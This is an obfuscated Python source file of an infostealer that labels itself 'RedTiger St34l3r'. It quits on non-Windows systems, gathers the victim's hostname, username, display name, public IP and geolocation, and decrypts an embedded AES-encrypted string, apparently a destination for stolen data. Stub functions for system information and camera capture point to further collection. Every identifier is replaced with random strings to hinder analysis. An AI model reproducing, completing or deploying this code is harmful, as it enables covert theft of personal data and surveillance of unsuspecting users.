
import sys

def IOVONTAQXRUYUYBPVYTUMENUEFMYCEREVGTXILFLNYOLSNKTZUTSXTCDSQWWCPWBJEMYAQPEQIDWTXLBBZYPXHEIRJJQV():
    def RNUTMXXOJKPWINRBZKKKAEYWAORSGSVXHHISOMIXIGPFXQWWDTHZLFMPKDYVKVDUPVNAGAZPGLYGWZO():
        if sys.platform.startswith("win"):
            return False
        else:
            return True
    
    try: 
        TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES = RNUTMXXOJKPWINRBZKKKAEYWAORSGSVXHHISOMIXIGPFXQWWDTHZLFMPKDYVKVDUPVNAGAZPGLYGWZO()
        if TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES == True:
            return TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES
    except:
        return True
    
if IOVONTAQXRUYUYBPVYTUMENUEFMYCEREVGTXILFLNYOLSNKTZUTSXTCDSQWWCPWBJEMYAQPEQIDWTXLBBZYPXHEIRJJQV() == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import base64
import ctypes
import threading
import discord
import zipfile
import io
from json import loads
from urllib.request import urlopen
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend

def QFYEQKEKUJFUFNRPRFWESFZFLDPLVNIPNIRDXDKLUFPYWMMNAZVYPMSMSSSVGESDQSUKUQWRVCVUGZD(ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK): 
    TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES_system_info = None
    return TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES_system_info

def CPUKIXZDIOXMYXAMNWJKSLWZUIZWKRAYGXHDTLMPAOQKQUVEKUVUKMIXMRCLFYIAVJCHCMWUKRISNBPKFQIIZKQXNQ(ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK):
    FCMLUIRECDYZJGYXXKNOFZQUQOHSSMZAPDGMZSOAQYOQTKHEGVIUAXVGSTDNRSSVN = None
    return FCMLUIRECDYZJGYXXKNOFZQUQOHSSMZAPDGMZSOAQYOQTKHEGVIUAXVGSTDNRSSVN

def WQEJIKOKEPQWSFBWCIYRERVXMGRBCRNSRIQKYQVLEXJDESIZLYXRWXUIBKBESGSIETFWKEVWZMEGCSYBPIYADCBQXIELDKIVXZN(ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK):
    LBYKQAYBIVTBMQRWQXNKMEPBOMMNVYTDYVRMCADJMAOHZULCUWTYOOFTBKPQKMS = None
    return LBYKQAYBIVTBMQRWQXNKMEPBOMMNVYTDYVRMCADJMAOHZULCUWTYOOFTBKPQKMS

def QCVUOSRRAIILSXJYLXZLYIJQWHERVNRDRCIBYBHAYVBXLDPWZTUXAUNPUARLGMRQBWJTEBWKSEVGXDRBMTIBETQFEKBOCZIKAUOO(): 
    XOHKZWKTMLCYLXLNDSNKJQPMYFWOBEPRFKBEFLDBHMJAPYLOGYDJLEMKJXWBLO = None
    return XOHKZWKTMLCYLXLNDSNKJQPMYFWOBEPRFKBEFLDBHMJAPYLOGYDJLEMKJXWBLO

def BGPQOVPXHZJSXYIATWRLRVSEDATUWZKDXOOLRSCINIEGZTCVKAYUQS(ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK): 
    SZDNITIHXGYVWRSLDZEAWADAKSFGQSCOTISOFHRHHXPEJALPKRFMQFRCAKLMHTQXGHTXWDGFFDCEFHEOVWFIRYOAPYXBLFCFDOQQ = None
    KAQPNBIKWBDBUSAZDKJHICRDYMPBFPMOJKCGXLKQTMUTGKEJBCQUOVAMHGDEFWSDFWHVVRDEMV = None
    LOXNIATXFGKVVPIGVYMNVPRQXBSRQOVUGYUQXQPGHOJQBQVICPXPSRWPRRVVVTOWUSQPIUQNLFPWBPZFJZLKTRVHEWIXZNGESQ = None
    EDHKUCJWZSHFYVTMOEKQRLPJWMZJVWVOJJMQYXCYLCRXCGNFOBIFVSPVHZRCJJJSXYHSGDPQSKHMJYGOROWTUPWPWMMEHVCDZTO = None
    ZOUAHFWPNYVIFMFRCJTFXEEIDNIYPISMUJXJKSQIOWREYKUNFSEHJSMCFNTMQTYXKLWWZYIQEALQIHLWNMZYTROYSFANWKUHU = None
    UVRHHSACUEEKHJTWBAPEMLWSOOOLFKTLNBPXCWZEZVLEIUQULXORVRNWABELDPIEJY = None
    return SZDNITIHXGYVWRSLDZEAWADAKSFGQSCOTISOFHRHHXPEJALPKRFMQFRCAKLMHTQXGHTXWDGFFDCEFHEOVWFIRYOAPYXBLFCFDOQQ, KAQPNBIKWBDBUSAZDKJHICRDYMPBFPMOJKCGXLKQTMUTGKEJBCQUOVAMHGDEFWSDFWHVVRDEMV, LOXNIATXFGKVVPIGVYMNVPRQXBSRQOVUGYUQXQPGHOJQBQVICPXPSRWPRRVVVTOWUSQPIUQNLFPWBPZFJZLKTRVHEWIXZNGESQ, EDHKUCJWZSHFYVTMOEKQRLPJWMZJVWVOJJMQYXCYLCRXCGNFOBIFVSPVHZRCJJJSXYHSGDPQSKHMJYGOROWTUPWPWMMEHVCDZTO, ZOUAHFWPNYVIFMFRCJTFXEEIDNIYPISMUJXJKSQIOWREYKUNFSEHJSMCFNTMQTYXKLWWZYIQEALQIHLWNMZYTROYSFANWKUHU, UVRHHSACUEEKHJTWBAPEMLWSOOOLFKTLNBPXCWZEZVLEIUQULXORVRNWABELDPIEJY

def WQRTRSCSCDEPGFBCSBNMBRVRISXHKORLNXPOYUKHEZBJOSBIQUUCRJORCIGMANZYPMAICEEYLYPGKF(ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK):
    YKTYRXAWIHYOWTTJZJUCNEJKZZJGZONBBHZRINVSLNMYQNHTZHCDPVVEGMSNOGHTAPUAGFHRNLBYKBCWOVBPL = None
    YHWJNEHXQWERJIJNULRAHBMRHZZESNGVGRYADBHWVXTQLXPORKZSSZIXRBNGFBHSRXAFJDFZVHMVDJACOUGDSWPMKHIJHHJMQXY = None
    HWZMJYVZXGFOTOPTMEXEEJMNNLKWLIIFWMKUXHZQKJVIYLZBZPAEUOUWUSIEKLTRWODOFVPZSXXKBQGJKNBEUXXPYBRFJSYIAPKY = None
    return YKTYRXAWIHYOWTTJZJUCNEJKZZJGZONBBHZRINVSLNMYQNHTZHCDPVVEGMSNOGHTAPUAGFHRNLBYKBCWOVBPL, YHWJNEHXQWERJIJNULRAHBMRHZZESNGVGRYADBHWVXTQLXPORKZSSZIXRBNGFBHSRXAFJDFZVHMVDJACOUGDSWPMKHIJHHJMQXY, HWZMJYVZXGFOTOPTMEXEEJMNNLKWLIIFWMKUXHZQKJVIYLZBZPAEUOUWUSIEKLTRWODOFVPZSXXKBQGJKNBEUXXPYBRFJSYIAPKY

def FFTPBZWTUYDPALMCJUIBZGKZGGIZMRMWLXYDPTOJFEBITVSASROAZACMRDJEOYPBJRGNOGVUB(ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK):
    AIYDCXMOXCGSQPTWFGXVADVLLFPOQUGKSYQTPLJHPSYFMHCCWIPW = None
    return AIYDCXMOXCGSQPTWFGXVADVLLFPOQUGKSYQTPLJHPSYFMHCCWIPW

def HGLKOAQITQVVOJGDFNNERGAHATXSHAYFGJVVOAFBWZJRCAWYILZCAGXCCTRTQINFEAQBJNUN(ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK):
    TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES_camera_capture = None
    return TUBHGYXFKPENORWUOFALFVUPJHDOHVXMDZCNRJEOVSTQUBFAFTLBGXXEORLYDXDMYGZELAKLYCYTQTQES_camera_capture

def HDZYYXHRCMWQDCOUEELJRCDBZMFRURLSDPFSIRPHMOEOOWFESHWPTRDIWTGTUGHSZJOGK(ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK): 
    TTRQDRSWAEIICLOEQWQGEJAHAMOFTXCZMLNDRCIPEBYCGZSAGC = None
    return TTRQDRSWAEIICLOEQWQGEJAHAMOFTXCZMLNDRCIPEBYCGZSAGC

def DJRHHOHGCSPYBIXYSTQVKDNCGGSXVYJNZYYYGUZFXNLROVLIPTILD(): pass
def MNPQXJAGXZBWLUJPROTJAAFXUPMCUOBURLJWXBCSRCGTLNXHELVXDVPKDMNMHIHJQIIFVYZVTWQONVMQMPXLPZENT(): pass
def DJJIEXWKJSTPDEXSCIEYTRNCBSNDMEXTKACCXKSMWSHIWBRVADUSNOQCOLAVUVTCJNFDPMIUP(): pass
def ECVCVWELOTYEHUFXDKZXZAERFESKGEEFLBEJWCMAESAEWVYBHMATMPCXWXESGVTRAAQKLEFO(): pass
def FNQYOCCWVBFHTHNQFKTTYXRUNJBHAJJMZXOCWIIUMEUZAOZFWNMMFBMVOOONQPKULSAPQMFMIJKUWTUMKPUZKU(): pass
def BSLSNJMXETXEHZIAVTKMTLJKHZPWKCUMWPKSSNTNCWZVJLTLCPZCAOXCCG(): pass
def ADRCGZLCXXUSDLVJZJOTPAKJRWPELSHJIALBECLDRSPFNXFUTQOV(): pass
def EFXLQTPGMZWKEPOMQPZKGWSAMEZGAOPLIMLMHCKWRLWDOSCHQCRFHH(): pass
def AJGANPSCJLRYGYFIJTNMFZZXKUVRARHEAQAJUEVFMUVWKQHOIZSTHURHEVHBUHEVTHXCKTJDLJMCOPATBY(): pass
def GQKTUHLFDXJQARMYYSNLPAAFTYRBTPKSZMRCQIHJEEKJRILZFOPGLBEWJWIBNBDGXABBANNRBCNZJZOBGWFBFKABTUOFFX(): pass
def KJAXWTWTTDRVFUURDOILKHQKTJCICNYNTEHUJYUEHYMTWTLWYKKEYKAIPHGWROKQHUDAZSWRENELFGQWXILDKPAJPUER(): pass
def QLYFPMDLLQLTZFVBJAECRVNWSUAJKRJUBQBMKICONOZAUMXDCTUB(): pass

def TZGFNPBJHNWTVLYNECFBTOFUZLRCPYYYIPQBXQOVUGRWEKAZRCXTJNMMMWRWQGNWMRKVBXCRRAROCBOOXEWVIFBT(title):
    try:
        if sys.platform.startswith("win"):
            ctypes.windll.kernel32.SetConsoleTitleW(title)
        elif sys.platform.startswith("linux"):
            sys.stdout.write(f"\x1b]2;{title}\x07")
    except:
        pass
        
def FIPIGQRTSESMDRQYWLOBJAWMBZSJXSOMQWWZKEEEWSQHGWXSXTDGVOBRRN():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def JCDUFZZNJAPEWDIKDTOKTXBJPVJJCAHPKXBBRHDLQOREKWKNZTSUGAAUIJKMKKTOELTOWQYOTNFDARIYWLARCAUYWOPRRLVMEMWO(ZTGPQOXUIKAJCNRMVNRYPNKJRARCSCXSVPNLNPSNJHCSFZKOML, FCGCWSXGQPTMSTHXRRIMLJXFVKUAAQCLIDGREGOADIRNATWOMYEYMVAEDAAEBAAHUEKTIRIVOVAYGLHVCTNJFNXMCOGGVQLIT):
    def HSPXFIOMFXMLAGVAOSQMRUUBGIAYMRXVJTTHGYBGZCJZWEDVKLVDJRTQUNGLFJSCTHAYOXYJPKIJ(RSESIIBLDZYJEKBFIPUETATDXGSCEWWVSWXAEQNEBOKRJZLUJFFNHXSYIETODFUW, YPOBPINQQRQVXBEXTYTTRSNRTJVBHURYFQJMZQYWQPQQRMFZMJJUBAFBIZJCYMNNBQAGYQTMMSXSEIAWRXW):
        KQPVOETERDCHOSFQSWYOPRKVVQDECBWZCLDKIGVHGZVQXOGTVENMWDXYZQY = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=YPOBPINQQRQVXBEXTYTTRSNRTJVBHURYFQJMZQYWQPQQRMFZMJJUBAFBIZJCYMNNBQAGYQTMMSXSEIAWRXW, iterations=100000, backend=default_backend())
        if isinstance(RSESIIBLDZYJEKBFIPUETATDXGSCEWWVSWXAEQNEBOKRJZLUJFFNHXSYIETODFUW, str):  
            RSESIIBLDZYJEKBFIPUETATDXGSCEWWVSWXAEQNEBOKRJZLUJFFNHXSYIETODFUW = RSESIIBLDZYJEKBFIPUETATDXGSCEWWVSWXAEQNEBOKRJZLUJFFNHXSYIETODFUW.encode()  
        return KQPVOETERDCHOSFQSWYOPRKVVQDECBWZCLDKIGVHGZVQXOGTVENMWDXYZQY.derive(RSESIIBLDZYJEKBFIPUETATDXGSCEWWVSWXAEQNEBOKRJZLUJFFNHXSYIETODFUW)

    ZTGPQOXUIKAJCNRMVNRYPNKJRARCSCXSVPNLNPSNJHCSFZKOML_data = base64.b64decode(ZTGPQOXUIKAJCNRMVNRYPNKJRARCSCXSVPNLNPSNJHCSFZKOML)
    YPOBPINQQRQVXBEXTYTTRSNRTJVBHURYFQJMZQYWQPQQRMFZMJJUBAFBIZJCYMNNBQAGYQTMMSXSEIAWRXW = ZTGPQOXUIKAJCNRMVNRYPNKJRARCSCXSVPNLNPSNJHCSFZKOML_data[:16]
    SHUAWUJDAKTKDDDOYYNILJVFKDLLQOSBYMOEQSQFUFGYAEHJOQWRPQFCHTVMTBHVKCIJXXJNAVFDUTGWPWTOUYNBJFG = ZTGPQOXUIKAJCNRMVNRYPNKJRARCSCXSVPNLNPSNJHCSFZKOML_data[16:32]
    ZTGPQOXUIKAJCNRMVNRYPNKJRARCSCXSVPNLNPSNJHCSFZKOML_data = ZTGPQOXUIKAJCNRMVNRYPNKJRARCSCXSVPNLNPSNJHCSFZKOML_data[32:]
    QSBNNSIXHJYGSPULPWPDTNRVUQEQVMZUUYPKJNINTVYOEVDGRIGHCLQYBPTKVUUGGPHNLVTGHIQLEKTMIWXEEAIX = HSPXFIOMFXMLAGVAOSQMRUUBGIAYMRXVJTTHGYBGZCJZWEDVKLVDJRTQUNGLFJSCTHAYOXYJPKIJ(FCGCWSXGQPTMSTHXRRIMLJXFVKUAAQCLIDGREGOADIRNATWOMYEYMVAEDAAEBAAHUEKTIRIVOVAYGLHVCTNJFNXMCOGGVQLIT, YPOBPINQQRQVXBEXTYTTRSNRTJVBHURYFQJMZQYWQPQQRMFZMJJUBAFBIZJCYMNNBQAGYQTMMSXSEIAWRXW)
    QJHGWEQHNEKZMHOSMTJPVBTHZEIAXZELFYEHCPYTOXPPOIIUFFDIBN = Cipher(algorithms.AES(QSBNNSIXHJYGSPULPWPDTNRVUQEQVMZUUYPKJNINTVYOEVDGRIGHCLQYBPTKVUUGGPHNLVTGHIQLEKTMIWXEEAIX), modes.CBC(SHUAWUJDAKTKDDDOYYNILJVFKDLLQOSBYMOEQSQFUFGYAEHJOQWRPQFCHTVMTBHVKCIJXXJNAVFDUTGWPWTOUYNBJFG), backend=default_backend())
    SOAYYYFCEETCOAANOPXBORIKXACEQZVWYOITXELEQJOHIUJSYEODCBXDPHFFGPEXECXPDUYFRPALXFLTXVPJSSKATFOLGXADQC = QJHGWEQHNEKZMHOSMTJPVBTHZEIAXZELFYEHCPYTOXPPOIIUFFDIBN.decryptor()
    GMVOUCWSJAOXHXUZABPQYBMGZQSTJMLLBRCEYCEBKIMLISYNBWZOTMKQSRHOBWLTIZQNAUYJGAVRMZSR = SOAYYYFCEETCOAANOPXBORIKXACEQZVWYOITXELEQJOHIUJSYEODCBXDPHFFGPEXECXPDUYFRPALXFLTXVPJSSKATFOLGXADQC.update(ZTGPQOXUIKAJCNRMVNRYPNKJRARCSCXSVPNLNPSNJHCSFZKOML_data) + SOAYYYFCEETCOAANOPXBORIKXACEQZVWYOITXELEQJOHIUJSYEODCBXDPHFFGPEXECXPDUYFRPALXFLTXVPJSSKATFOLGXADQC.finalize()
    HARXTUUTUUNDGNEXHFFJTRJXRINMEHMTSXZBUKPJJZPDCVLPJSCYRJPRPGE = padding.PKCS7(128).unpadder()
    JPLAYIPMWPJVFAJQVZEFNMYXPLTPUMHSLEZWZGODKHOSKXSSFBWDWSWTYCWEXHMEILPIIGXAHLHGRXZRQTP = HARXTUUTUUNDGNEXHFFJTRJXRINMEHMTSXZBUKPJJZPDCVLPJSCYRJPRPGE.update(GMVOUCWSJAOXHXUZABPQYBMGZQSTJMLLBRCEYCEBKIMLISYNBWZOTMKQSRHOBWLTIZQNAUYJGAVRMZSR) + HARXTUUTUUNDGNEXHFFJTRJXRINMEHMTSXZBUKPJJZPDCVLPJSCYRJPRPGE.finalize()
    return JPLAYIPMWPJVFAJQVZEFNMYXPLTPUMHSLEZWZGODKHOSKXSSFBWDWSWTYCWEXHMEILPIIGXAHLHGRXZRQTP.decode()

TZGFNPBJHNWTVLYNECFBTOFUZLRCPYYYIPQBXQOVUGRWEKAZRCXTJNMMMWRWQGNWMRKVBXCRRAROCBOOXEWVIFBT("")

try: WNDEJVOECCXAEUNIUDPMQFHXYAARENRPORBUGPYZWFKDCMAHZVICFEDFCAXGWRKDLOX    = socket.gethostname()
except: WNDEJVOECCXAEUNIUDPMQFHXYAARENRPORBUGPYZWFKDCMAHZVICFEDFCAXGWRKDLOX = "None"

try: CPIPAHEMSCOPTKWOFWARXJCXLXTJITZDKQGUDAYVPHDWUECMQFMSGWTSUOZMQLIBPAHFUG    = os.getlogin()
except: CPIPAHEMSCOPTKWOFWARXJCXLXTJITZDKQGUDAYVPHDWUECMQFMSGWTSUOZMQLIBPAHFUG = "None"

try: VXDCREHDZBZZKCRGTEOYYEZJBEHLZGIBAPDJHTDNAHKQESEGTNZASECZZPLBMW    = win32api.GetUserNameEx(win32api.NameDisplay)
except: VXDCREHDZBZZKCRGTEOYYEZJBEHLZGIBAPDJHTDNAHKQESEGTNZASECZZPLBMW = "None"

try: SKJYIRPEQUCCQXSTVASWVQUXXUDKGHMFEYVYIXDTTONIAUBEWTELQXO    = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: SKJYIRPEQUCCQXSTVASWVQUXXUDKGHMFEYVYIXDTTONIAUBEWTELQXO = "None"

try: ZUQUPWUGSNAVDPHPJERBTLELULSUENWVRBFNKBTVWALHSMSIZHLWLPKDZHTIGEWKPBHFEPJYPNNNX    = socket.gethostbyname(socket.gethostname())
except: ZUQUPWUGSNAVDPHPJERBTLELULSUENWVRBFNKBTVWALHSMSIZHLWLPKDZHTIGEWKPBHFEPJYPNNNX = "None"

KQUHMMHUYFBVEJXDYLCVYYZVTBRWJNOHRRMLHCAWIZCSTLVBKI = r"""
2RliUKxuUw6XUZIo4so6482s76bnXeJ1OT52BHua8wcLCIJVvad7BgzmMsi/LHQ6tRLYWcd3zET30CVDPAOcHCyR/tt7NMl8dNKXzQuiXp0HzDsPaV5rdEIayaTr/9u1NG7KJftlxPJ7IYGjH4BR/04v+CFqlEGI43aHiJUd/IYS864HcUyzC5Es6f6t4HEIuihm+j+7wh47A49L5leKwA==
"""

JTVZXSFCLVHKFIGZYDZTKHBKVJFNGFVDBFCGNQYOPZXFFIRCGSIPBPQVLBIOTYXDXXYEBW            = "LsxndEQNpkNxNhfFcOuYhVEfuAnhSlksAYQhypNuUKdkMCQWtLweIJCTfdqyLgZciZUfPdleWRoJWSFtjkGazsyrCgBMqMJwFyjNNioKaFtCudHVUkxtkkrWmQAcGKGGiAijWhFflhc"
DBYAIOZTQJBWKXJQBYHLOGQLKZTFRKCXXTFKRLXZAFEUUTBVNBHKVMHYTGGQGQWOAUSRQ        = "None"
SJEQUIXSZQGIZEMOAKAVWPJXJKNREYNDBIKRSHMOBUJIPQYHJOLFHMHQULVSVETKIHECFHDCPIUISQVYLHVJLNLQUTHJXTHVZMS    = 0xa80505
LRIZKITIIEHHFBQLZUGEDICFKZTIQKBTVHZKBDJMFKLWQQVVZKXCHTAGCEZHCBPJUZYXSZAJUKIQELCTFUVCC = "RedTiger St34l3r"
GSJZRMOSHSUKKUWREUPNTMMFRMYYLOZUIPXRLPMSBTISZSQPVXGF   = "https://google.com"
VISGTROLPYHIPVTRDLSXSCSOAAHIGDVPCCFECEHKEUCRSZEUVWEVRCVPJSJY    = "RedTiger St34l3r - github.com/loxy0dev/RedTiger-Tools"
UTEUZRVWNPCFBWHKLCJTTOWNPKZZSZTDCLHNPRNQZAOGUYCLWYXGYYMEGHCHSHAPBHKBYFZKEIKJWUYRFH   = {"text": VISGTROLPYHIPVTRDLSXSCSOAAHIGDVPCCFECEHKEUCRSZEUVWEVRCVPJSJY, "icon_url": GSJZRMOSHSUKKUWREUPNTMMFRMYYLOZUIPXRLPMSBTISZSQPVXGF}
ZNDNKJSSKCEGGTSYTVHBGIFPOBWGTINEBPKLUTANRFTWSNGUNALRQJL    = f'`{CPIPAHEMSCOPTKWOFWARXJCXLXTJITZDKQGUDAYVPHDWUECMQFMSGWTSUOZMQLIBPAHFUG} "{SKJYIRPEQUCCQXSTVASWVQUXXUDKGHMFEYVYIXDTTONIAUBEWTELQXO}"`'
XVEQWBNFFGUOAQDLXLPPIABWSNIJPZMAHEEQYWWZTXZNBYDADDIIPUCSNOBHHEWJAADTGISMVZQQULDZDNOLZ    = JCDUFZZNJAPEWDIKDTOKTXBJPVJJCAHPKXBBRHDLQOREKWKNZTSUGAAUIJKMKKTOELTOWQYOTNFDARIYWLARCAUYWOPRRLVMEMWO(KQUHMMHUYFBVEJXDYLCVYYZVTBRWJNOHRRMLHCAWIZCSTLVBKI, JTVZXSFCLVHKFIGZYDZTKHBKVJFNGFVDBFCGNQYOPZXFFIRCGSIPBPQVLBIOTYXDXXYEBW)

IYLGQECIETCOAHJSFXIPKXGUAXKVSFLLSOBRFOUVLUHKDIQJNUQNRPJORTNHPKRDCUKHAAAIMPEIWKWERKPWOKXCU           = os.getenv("WINDIR", None)
JQKUINCKURTKMOXNUJQRWAOXNDKNMUMXMSHNLAKRXMHUBOXQMDTTZPTEDHVTGHUUNAXHQMSLDBNGQURGKTRMWOGLPJ       = os.getenv('USERPROFILE', None)
TIPFXSNIMAYKTXVKKJGSJQZKDBMYQPLYQJSSMVQPSFPMEGTFYBZTHDCQZJIHUIMJSQJKNQFTMYMWUNQEH     = os.getenv('LOCALAPPDATA', None)
LSWNQUTNXGAQDDKMYVCEQQYXPIIGHRALUVBWGGHLNOSXXPHVZJHYOOHHV   = os.getenv('APPDATA', None)
QIFAJOAALLUNMNKCJAVIDODAXYUGBIBRWHUVKDBJGDTEQVLSQYMFQNLAJGRRXOSTXIPNLDILJBMRZXPOFMTGPJ = os.getenv('ProgramFiles(x86)', None)
if QIFAJOAALLUNMNKCJAVIDODAXYUGBIBRWHUVKDBJGDTEQVLSQYMFQNLAJGRRXOSTXIPNLDILJBMRZXPOFMTGPJ is None:
    QIFAJOAALLUNMNKCJAVIDODAXYUGBIBRWHUVKDBJGDTEQVLSQYMFQNLAJGRRXOSTXIPNLDILJBMRZXPOFMTGPJ = os.getenv('ProgramFiles', None)

try:
    JIPAOEQVPZYGZEFCWTQQJGRZTXDOVMEAKQFPPDIHCWRVBZFASHOVJCRWZHJGXZZXIWCDSCVKNW = requests.get(f"https://{DBYAIOZTQJBWKXJQBYHLOGQLKZTFRKCXXTFKRLXZAFEUUTBVNBHKVMHYTGGQGQWOAUSRQ}/api/ip/ip={SKJYIRPEQUCCQXSTVASWVQUXXUDKGHMFEYVYIXDTTONIAUBEWTELQXO}")
    CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN = JIPAOEQVPZYGZEFCWTQQJGRZTXDOVMEAKQFPPDIHCWRVBZFASHOVJCRWZHJGXZZXIWCDSCVKNW.json()

    HSKRKXMQBZWXVPMVVQRZACTNLZMVJKMCZWZNRRXNKINTSNPXOIVMDSCEQKWWJDPBOKCTHVPO = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('country', "None")
    HSKRKXMQBZWXVPMVVQRZACTNLZMVJKMCZWZNRRXNKINTSNPXOIVMDSCEQKWWJDPBOKCTHVPO_code = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('country_code', "None")
    QPYNTZXJVEHSXUIZNKXVGVRYRCOIAFMXSDZKEWPKYNWRAULIRVIDDRBUVTYSRWRWGQIHHDXA = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('region', "None")
    QPYNTZXJVEHSXUIZNKXVGVRYRCOIAFMXSDZKEWPKYNWRAULIRVIDDRBUVTYSRWRWGQIHHDXA_code = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('region_code', "None")
    XAMTPOYRAWBKLMQLRQCRBOXBHKLHIWNFZTEENIZKYZHSVOCFTYBB = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('zip', "None")
    HDTYHDKZVZFQGPVZYDCUYVNAQSAORZVGCZDNHMMCYDBCMVVTMQZUTHSRWJFLZWTIEQJXWXULYCB = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('city', "None")
    COSWGEHBMHFEJHNKJAOUBOMHADOKQDJFIWKEQGLCUNGTNVMHXYOHSAKSZNWAQTLCWDHPKRWVXJSZUNKSYD = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('latitude', "None")
    THOZGMHZOXUABCZUVBZXHEJREQAVOTYSYEMDLHGEYKAXNESOVXHTQCZFFNSIKGUGQUJYAGDRWLCDHH = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('longitude', "None")
    GLNKVCTGGCZSHGUYZWWCATUWAHRHQWLPPDNBHVDTHKHCVCBHEDWCEYYWMVYSZZ = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('timezone', "None")
    HFBPHTSBSSLBHBWKZWWOPRVUZUIIMPJKBTGSRIDQLNOWTTSKEA = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('isp', "None")
    HOBMUEQQNQSQIMDCZLKPUIOUJJMQGYCGFLGUYURGXGDTSMMBPCKUAUWEZ = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('org', "None")
    XSRDIZPFIKJDOMIVZQNAADYOIUCJYKQBOZZDSCBDXQBPQRURHDJHXUWKWZTTIVZPSFGZWBSIYMHQTDKDIJVXL = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('as', "None")
except:
    JIPAOEQVPZYGZEFCWTQQJGRZTXDOVMEAKQFPPDIHCWRVBZFASHOVJCRWZHJGXZZXIWCDSCVKNW = requests.get(f"http://ip-api.com/json/{SKJYIRPEQUCCQXSTVASWVQUXXUDKGHMFEYVYIXDTTONIAUBEWTELQXO}")
    CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN = JIPAOEQVPZYGZEFCWTQQJGRZTXDOVMEAKQFPPDIHCWRVBZFASHOVJCRWZHJGXZZXIWCDSCVKNW.json()

    HSKRKXMQBZWXVPMVVQRZACTNLZMVJKMCZWZNRRXNKINTSNPXOIVMDSCEQKWWJDPBOKCTHVPO = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('country', "None")
    HSKRKXMQBZWXVPMVVQRZACTNLZMVJKMCZWZNRRXNKINTSNPXOIVMDSCEQKWWJDPBOKCTHVPO_code = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('countryCode', "None")
